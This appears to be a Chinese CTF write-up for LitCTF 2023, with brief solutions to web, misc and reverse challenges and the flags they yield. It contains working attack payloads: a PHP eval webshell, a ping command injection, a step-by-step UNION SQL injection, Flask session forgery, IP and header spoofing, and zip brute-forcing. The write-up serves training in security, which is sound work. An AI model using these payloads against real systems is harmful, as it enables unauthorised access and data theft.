LitCtf 2023


我Flag呢?

源代码最下面,控制台giveMeEgg()可获得LitCTF{First_t0_The_k3y! (1/?)

导弹迷踪

死亡后显示CRASHED,死亡和通关应该在同一个js里面
因此
找到

PHP是世界上最好的语言!!

flag位于根目录
直接 system('cat /flag);
获得 flag=NSSCTF{31cd1b43-adad-4b34-b20d-3705c068aae0}

Ping

直接ls出不来

试着在bp里用逻辑运算符
获得

flag=NSSCTF{ff7202ac-599c-4401-85d4-b4d7c47a4636}

Flag点击就送!

查看网页cookieeyJuYW1lIjoibmFtZSJ9.ZMeS1Q.NR1OCPWmPeSWEJ4-m3c8m-qehb4
好像出问题了,重启后得到eyJuYW1lIjoibmFlbSJ9.ZMeiXw.daPMph6hBI2FRkMcL3Ta2aO3rW0
属于flask session伪造
内容序列化.时间.反篡改值
base64解密后
{"name":"naem"}.d洽_.uL??崊FC/t谫7璵
由题目不过只有管理员才能拿到
尝试把naem改成admin试试
获得eyJuYW1lIjoiYWRtaW4ifQ==
似乎不对

看wp。原来是 LitCTF
获得 eyJuYW1lIjoiTGl0Q1RGIn0=

啊?

1zjs

在调试器里面搜索,找到PERFORMANCE OF THIS SOFTWARE.Your gift just take it : /f@k3f1ag.php

是jsfuck编码,解密后获得

NSSCTF{e9[]0[]ca7[]1[]c-c4[]5[]e-4[]bb0[]-9[]0[]bd-1[]0[]5[]b5[]f8[]2[]9[]5[]d9[]}
NSSCTF{e90ca71c-c45e-4bb0-90bd-105b5f8295d9}

作业管理系统

根据提示,用户名和密码都是admin
登录后又看到提示

进入后获得彩蛋

wow 你找到了第二个彩蛋哦~ _S0_ne3t? (2/?)
上传下webshell
<?php @eval($_POST['cmd']);?>
蚁剑连接后获得

Http pro max plus

只允许本地访问尝试在请求头加上x-Forwarded-For:127.0.0.1,结果获得只会xff?真是逊呐
除xff外,还可以通过Client-Ip来伪造IP,获得You are not from pornhub.com !
通过referer:pronhub.com进行下一步
获得用Chorme浏览器啊!User-Agent里面改成Chrome
接下来又要求开代理,使用Via来达到目的
获得/wtfwtfwtfwtf.php
进入页面后F12你就冲吧,什么都冲只会害了你自己 bdy好康的在 /sejishikong.php
冲完啦?拿上你的flag赶紧走NSSCTF{199352b3-f5ba-48c3-93d2-72094f09a32f}

Vim yyds

1
2
3
Vim是linux中的常用编辑器
vim中的swp即swap文件,在编辑文件时产生,它是隐藏文件,如果程序正常退出,临时文件自动删除,如果意外退出就会保留,文件名为 .filename.swp,(第一次产生的交换文件名为“.filename.txt.swp”;再次意外退出后,将会产生名为“.filename.txt.swo”的交换文件;而第三次产生的交换文件则为“.filename.txt.swn”)
备份文件名为 filename~

/.index.php.swp
获得

1
2
3
4
5
eval(system($_POST['cmd']));.  
echo "<p>Oh You got my password!</p>";.
if ($_POST['password'] === base64_encode($password)) {.
echo "<p>can can need Vim </p>";.
$password = "Give_Me_Your_Flag";.

password编码后得到R2l2ZV9NZV9Zb3VyX0ZsYWc=

这是什么?SQL !注一下 !

1
2
3
4
  Key Source
<?php
$sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';
$result = $conn->query($sql);

根据题目给出的

1
2
3
4
5
6
7
8
1.    1)))))) order by 1#  //6个`)`与前面的闭合,后面补一个`#`注释掉后面的`)`
2. 3)))))) order by 3# //回显`0result`,应该只有两个字段
3. -1)))))) union select 1,2# //
4. -1)))))) union select 1,database()# //回显`ctf`说明数据库叫`ctf`
5. -1)))))) union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctf'# //获得表名 `users`
6. -1)))))) union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='ctf'# //获得 `id,username,password`
7. -1)))))) union select 1,group_concat(id,0x7e,username,0x7e,password) from users# //`1tanjiOHHHHHHH,2fake_flagF1rst_to_Th3_eggggggggg!} (4/4) )`彩蛋?
8.



原来你也玩原神 (初级)

原来你也玩原神www

404notfound (初级)

用010editor打开,LitCTF{Its_404_but_1ts_n0t_a_page}

What_1s_BASE (初级)

直接解密就行LitCTF{KFC_Cr4zy_Thur3day_V_me_50}

这羽毛球怎么只有一半啊(恼 (初级)

这不是我们原神的纳西妲吗,怎么都火出圈了,下次发的时候记得标明出处
修改一下高度LitCTF{Fl4g_0fcourse!}

喜欢我的压缩包么 (初级)

密码6位数,爆破一下,用Ziperello
114514
LitCTF{Do-u-like-my-zip-p4ck?}

Take me hand (初级)

wireshake搜下ctf
LitCTF{Give_y0ur_hand_to_me!!!_plz}




世界上最棒的程序员

flag位于_start Flag: LitCTF{I_am_the_best_programmer_ever}

ez_XOR

1
2
3
4
5
6
7
8
9
10
11
12
__main();
strcpy(Str2, "E`}J]OrQF[V8zV:hzpV}fVF[t");
v9 = 0;
v10 = 0;
v11 = 0;
v12 = 0;
v13 = 0;
v14 = 0;
v15 = 0;
printf("Enter The Right FLAG:");
scanf("%s", Str1);
XOR(Str1, 3);

进入_XOR查看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
size_t __cdecl XOR(char *Str, char a2)
{
size_t result; // eax
size_t i; // [esp+2Ch] [ebp-Ch]

for ( i = 0; ; ++i )
{
result = strlen(Str);
if ( i >= result )
break;
Str[i] ^= 3 * a2;
}
return result;
}

得知,以9为密钥,对E}J]OrQF[V8zV:hzpV}fVF[t进行解密
获得LitCTF{XOR_1s_3asy_to_OR}

enbase64